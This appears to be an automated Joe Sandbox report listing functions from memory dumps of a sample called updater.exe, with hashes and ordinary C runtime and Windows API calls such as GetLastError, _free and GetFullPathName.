                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789-$0123456789-
                                    • API String ID: 2124549159-2494171821
                                    • Opcode ID: 264b18beab12f529059ac2d0fb59c4879ee823ad333e2693a72547649125427e
                                    • Instruction ID: 075d64ecc3697b3655cceb3ccd5904f6f706151258c5ecd9566003a054f88af1
                                    • Opcode Fuzzy Hash: 264b18beab12f529059ac2d0fb59c4879ee823ad333e2693a72547649125427e
                                    • Instruction Fuzzy Hash: 26418D71900209EFCF0ADF99D980AEEBBB5FF14314F1001AAF511A72A1DB759A46CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +}$C:\Users\user\Desktop\updater.exe
                                    • API String ID: 0-3245524050
                                    • Opcode ID: e728bdfb5f9f6d14c8c87d13f420d48b9b67ab77b98595a6961681ada454e7fd
                                    • Instruction ID: 814324cad6de1a5cf25ef3cdc0f468f65b8d82fcc92236cc5b1b2717cb6a184f
                                    • Opcode Fuzzy Hash: e728bdfb5f9f6d14c8c87d13f420d48b9b67ab77b98595a6961681ada454e7fd
                                    • Instruction Fuzzy Hash: FE4182B1E00219AFDB269FDED88499FBBF8EF95710B14006BE50497335E7708A81CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 01407885
                                      • Part of subcall function 013FC009: std::_Lockit::_Lockit.LIBCPMT ref: 013FC01A
                                      • Part of subcall function 013FC009: int.LIBCPMT ref: 013FC031
                                      • Part of subcall function 013FC009: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC08B
                                    • _Find_elem.LIBCPMT ref: 01407921
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: %.0Lf$0123456789-
                                    • API String ID: 2124549159-3094241602
                                    • Opcode ID: 565677d92b67a88504fb87da9cb35de019b766743f8223e21604758ea6246a21
                                    • Instruction ID: ca07cfc89793f5592546f43e0276ef65f3110bbadab9415ab97935c9bd8a41e1
                                    • Opcode Fuzzy Hash: 565677d92b67a88504fb87da9cb35de019b766743f8223e21604758ea6246a21
                                    • Instruction Fuzzy Hash: DD41A03190021ADFDF12DFD9C984AEDBBB5FF14315F14016AE941AB2A4C730E956CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 01407B6A
                                      • Part of subcall function 013CEAE4: std::_Lockit::_Lockit.LIBCPMT ref: 013CEAF7
                                      • Part of subcall function 013CEAE4: int.LIBCPMT ref: 013CEB0E
                                      • Part of subcall function 013CEAE4: std::_Lockit::~_Lockit.LIBCPMT ref: 013CEB5E
                                    • _Find_elem.LIBCPMT ref: 01407C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789-$0123456789-
                                    • API String ID: 2124549159-2494171821
                                    • Opcode ID: 92d3a29fb9a398cb9534970e29360bcdf9dd08e8a112362862088af810e4ff7f
                                    • Instruction ID: 0fed7335702716ec17ea4f67edade60ee87dcecf29fbe1006e5957f057b446a8
                                    • Opcode Fuzzy Hash: 92d3a29fb9a398cb9534970e29360bcdf9dd08e8a112362862088af810e4ff7f
                                    • Instruction Fuzzy Hash: E641A431900219DFCF06DFD9C980AEE7BB5FF14315F04016AEA406B2A4C730E956CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Mpunct$Getvals
                                    • String ID: $+xv
                                    • API String ID: 455491934-1686923651
                                    • Opcode ID: a536054cc82902cbb58f3f72aa835c7656ef467d61a80e24d6f223f3520e0bd4
                                    • Instruction ID: 37efbc6c0558e7e4b1b7436e6dca30c11ac383c9414f06bb47ebc4bba7d40446
                                    • Opcode Fuzzy Hash: a536054cc82902cbb58f3f72aa835c7656ef467d61a80e24d6f223f3520e0bd4
                                    • Instruction Fuzzy Hash: 0D21B5B1904B526FD722DF768894B3B7EE8AB1C200F04096FE599C7A90D774E651CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aullrem$__aulldiv__aulldvrm
                                    • String ID:
                                    • API String ID: 181600486-0
                                    • Opcode ID: 0e068ea99e23335b7125adaea46cec9fc938b0339b0b815c16e5b1f50a6f57c8
                                    • Instruction ID: af56656095986deec7ad05b9b22b3125f0cb02c1446ec402f7607aadb93fac83
                                    • Opcode Fuzzy Hash: 0e068ea99e23335b7125adaea46cec9fc938b0339b0b815c16e5b1f50a6f57c8
                                    • Instruction Fuzzy Hash: 12D18B326087818FD72ACE3D949066BBFE5BFCA608F188A5EF4C997251D730D546CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
                                    • Instruction ID: b2fccac52869b96e3852f76b5fa66d16b18d05c90c5a266f135c2b7d97fdc87e
                                    • Opcode Fuzzy Hash: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
                                    • Instruction Fuzzy Hash: 03B14832A002669FDB21CF69C880FBFBFE5EF55350F54416BD844AB361D6B48A81CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strcspn$H_prolog3_ctype
                                    • String ID:
                                    • API String ID: 838279627-0
                                    • Opcode ID: 03cc043357b9d5f78b2aa4b7ddb58c57eac882ed4068f77c321e17c70e5c3957
                                    • Instruction ID: f2d03c3fda80592b6b08bdf95fb2470e095e684d23ee99868459197c2908c610
                                    • Opcode Fuzzy Hash: 03cc043357b9d5f78b2aa4b7ddb58c57eac882ed4068f77c321e17c70e5c3957
                                    • Instruction Fuzzy Hash: 4FC15A71D0024A9FDF15DFD8C988AEEBBB9FF58314F14401EEA45AB251D730AA45CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strcspn$H_prolog3_ctype
                                    • String ID:
                                    • API String ID: 838279627-0
                                    • Opcode ID: 2373e0c5e0d2c49fbbfc8656f95c113b61572ab1001cb66d9016159984cd6ac6
                                    • Instruction ID: 4f72376bed0be65c7d939c8b76bfce0103f5de589f564e8cd66777b6674ab388
                                    • Opcode Fuzzy Hash: 2373e0c5e0d2c49fbbfc8656f95c113b61572ab1001cb66d9016159984cd6ac6
                                    • Instruction Fuzzy Hash: 4AC15C75D0024A9FDF15DFD8C984AEEBBB9FF58314F14401EEA09AB251D730AA45CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strcspn$H_prolog3_ctype
                                    • String ID:
                                    • API String ID: 838279627-0
                                    • Opcode ID: cc0e85da56da7ce6c7e4de6428595e2487d8b3db50ccb926d91bcebb2c267f8f
                                    • Instruction ID: 93c886b48319e364e60b1412b043e24f825ea38739e375c66b78cc56692d5b57
                                    • Opcode Fuzzy Hash: cc0e85da56da7ce6c7e4de6428595e2487d8b3db50ccb926d91bcebb2c267f8f
                                    • Instruction Fuzzy Hash: B0C1607190024ADFDF15DF98C884AEEBFB9FF18318F14402EEA45AB251D7309A55CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: ed97ca2aaf2864779fbe1308088066ff9a54c38f4477899e559284de04694926
                                    • Instruction ID: a8e4997d949ccd93b69a85071296df0855f121828d31c7e84ea15c4fca6697e8
                                    • Opcode Fuzzy Hash: ed97ca2aaf2864779fbe1308088066ff9a54c38f4477899e559284de04694926
                                    • Instruction Fuzzy Hash: C851B4B16016069FEB258F6AD840BAB7BA4FF14B10F14452FEB05A77B8D731E880C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3a8bff6735ff35526ae459ff26d0cde05b8632130da584d79cdd36ecfcf6409f
                                    • Instruction ID: ded41f985ae6e958f2da51003e9a394811914b8507656499898b6054beb36ac5
                                    • Opcode Fuzzy Hash: 3a8bff6735ff35526ae459ff26d0cde05b8632130da584d79cdd36ecfcf6409f
                                    • Instruction Fuzzy Hash: 5241C376A00315AFD7259F79C841B5ABBF9FB9C720F10466FE115DB3A0E275A9808780
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 0142F85E
                                    • _free.LIBCMT ref: 0142F887
                                    • SetEndOfFile.KERNEL32(00000000,0142C3CA,00000000,01420CCF,?,?,?,?,?,?,?,0142C3CA,01420CCF,00000000), ref: 0142F8B9
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0142C3CA,01420CCF,00000000,?,?,?,?,00000000), ref: 0142F8D5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFileLast
                                    • String ID:
                                    • API String ID: 1547350101-0
                                    • Opcode ID: 078492f2fbb5df41120de22d9a62a20485ff3ef8207b22cc1d6279fded6977ac
                                    • Instruction ID: cdd3cad652156ae05ab1f07aa0d907f89457ebe67988f43ce825264ede826e9e
                                    • Opcode Fuzzy Hash: 078492f2fbb5df41120de22d9a62a20485ff3ef8207b22cc1d6279fded6977ac
                                    • Instruction Fuzzy Hash: C941D8729005729BDB11ABBACC40B5EBA75EF64320FD4051BE514A72B4EBB4D4888761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • VirtualQuery.KERNEL32(83000000,4350CDAC,0000001C,4350CDAC,?,?,?), ref: 01431656
                                    • __FindPESection.LIBCMT ref: 01431693
                                    • _ValidateScopeTableHandlers.LIBCMT ref: 014316B3
                                    • __FindPESection.LIBCMT ref: 014316CD
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                    • String ID:
                                    • API String ID: 1876002356-0
                                    • Opcode ID: dd8ace880eec46a1db9cfb512da37a17276cdc74447491f3e1ed1a62a90bd73f
                                    • Instruction ID: d8adc4877d6b979f89b321f582a9e8be459fb37df3e378ee948debc87abe3de8
                                    • Opcode Fuzzy Hash: dd8ace880eec46a1db9cfb512da37a17276cdc74447491f3e1ed1a62a90bd73f
                                    • Instruction Fuzzy Hash: FF318475B003058BEF25DBAD99406AE77A8EB8C750F19016AED09D7372D731EC01CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0141AF9F: _free.LIBCMT ref: 0141AFAD
                                      • Part of subcall function 0142749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0142165F,?,00000000,00000000), ref: 0142753D
                                    • GetLastError.KERNEL32 ref: 014278DF
                                    • __dosmaperr.LIBCMT ref: 014278E6
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 01427925
                                    • __dosmaperr.LIBCMT ref: 0142792C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: cedfcef43cc9916c2b1622797f9eccefa41b73d456016358ef01be73bda86815
                                    • Instruction ID: c7c0adcf17f8c3e9363f76efbe832fbaecf407ca080b93a96b83f592e76b1ac7
                                    • Opcode Fuzzy Hash: cedfcef43cc9916c2b1622797f9eccefa41b73d456016358ef01be73bda86815
                                    • Instruction Fuzzy Hash: 69218871604326AFAB21AF668C8096BB7ACFF34275740451BF85997271E770DC808BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013D2F5C: GetVersionExA.KERNEL32(?), ref: 013D2F80
                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 013D3919
                                    • GetFullPathNameW.KERNEL32(00000000,?,00000000,00000000), ref: 013D393B
                                      • Part of subcall function 01415640: _free.LIBCMT ref: 01415653
                                      • Part of subcall function 013D2FF8: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 013D300F
                                      • Part of subcall function 013D2FF8: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 013D3036
                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000), ref: 013D3951
                                    • GetFullPathNameA.KERNEL32(00000000,00000003,00000000,00000000), ref: 013D397B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FullNamePath$ByteCharMultiWide$Version_free
                                    • String ID:
                                    • API String ID: 3265977510-0
                                    • Opcode ID: a446339892e98d355b4c4958f3d264607ae3f63db7a452e06ec3dd89c90dabb3
                                    • Instruction ID: 9f7d2e98e52c21fd5afd5b4c15aeb19e878b2cb39b14982c5e43e63ef4dca826
                                    • Opcode Fuzzy Hash: a446339892e98d355b4c4958f3d264607ae3f63db7a452e06ec3dd89c90dabb3
                                    • Instruction Fuzzy Hash: 8711E7B7501216BFDB21BBBAFC44DAF7A6DEFA25657000419F1099A154DF308D05C3B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62c48ea89069a6f250f043219782bd253901d6eaba3a2a68af005017af8da23a
                                    • Instruction ID: a15117719ee5f4bdd3e2e5753d1d3ef323839d4b0286d58db904a09dab8aff5b
                                    • Opcode Fuzzy Hash: 62c48ea89069a6f250f043219782bd253901d6eaba3a2a68af005017af8da23a
                                    • Instruction Fuzzy Hash: 9021A4F1605256BFDB21AF768C9096BB7ACEF54274720851BF418D72B8E731DC4087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                    • _free.LIBCMT ref: 014204FD
                                    • _free.LIBCMT ref: 01420533
                                    • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: b03057c8a85f29ba593305a844f5b1384a179d5f20ece09c8c89ce541679119c
                                    • Instruction ID: e28ee9f6929840eb046e0b92c970c4805b87361cfff407352136730e193ef6bd
                                    • Opcode Fuzzy Hash: b03057c8a85f29ba593305a844f5b1384a179d5f20ece09c8c89ce541679119c
                                    • Instruction Fuzzy Hash: DB1101722022127E971126795C84E2B25D7ABE1671795423BF618832F5FD71CCC68230
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 014205F7
                                    • _free.LIBCMT ref: 01420654
                                    • _free.LIBCMT ref: 0142068A
                                    • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 01420695
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 7f19823a73df2c0a7f9ca282b060059d84f7e0087615cd7b8f2cae527d49ce39
                                    • Instruction ID: 69c2f77c9a0d26a1b93a54379f21fecec979b4089e55dcdbd1f33f97778ae1b7
                                    • Opcode Fuzzy Hash: 7f19823a73df2c0a7f9ca282b060059d84f7e0087615cd7b8f2cae527d49ce39
                                    • Instruction Fuzzy Hash: C211CA712012227ED73126795C84E2B25DBABE1675BB5012BF62C932F5FD7188869220
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 013F8652
                                      • Part of subcall function 013F70FE: std::_Lockit::_Lockit.LIBCPMT ref: 013F710F
                                      • Part of subcall function 013F70FE: int.LIBCPMT ref: 013F7126
